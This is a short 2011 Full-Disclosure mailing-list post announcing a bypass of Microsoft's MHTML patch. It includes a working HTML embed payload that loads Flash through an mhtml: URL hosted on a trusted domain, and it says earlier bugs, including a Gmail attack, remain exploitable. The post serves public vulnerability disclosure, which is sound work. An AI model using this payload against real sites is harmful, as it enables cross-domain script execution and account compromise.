[Full-disclosure] MS mhtml patch bypass
sec yun
root at wooyun.org
Tue Apr 19 06:40:34 BST 2011
Hi
Someone reported a case of bypassing the mhtml patch:
http://www.wooyun.org/bugs/wooyun-2010-01929
<embed type="application/x-shockwave-flash"
src="mhtml:http://trusteddomain.com/wooyun.jpg!wooyun.swf" allowNetworking=all
AllowScriptAccess=samedomain width=500 height=500></embed>
Some vulnerabilities like http://www.wooyun.org/bugs/wooyun-2010-01474 (Gmail hack) will
still be exploitable.
Credits: http://www.wooyun.org/whitehats/latentwind
:)
Full-Disclosure is hosted and sponsored by Secunia.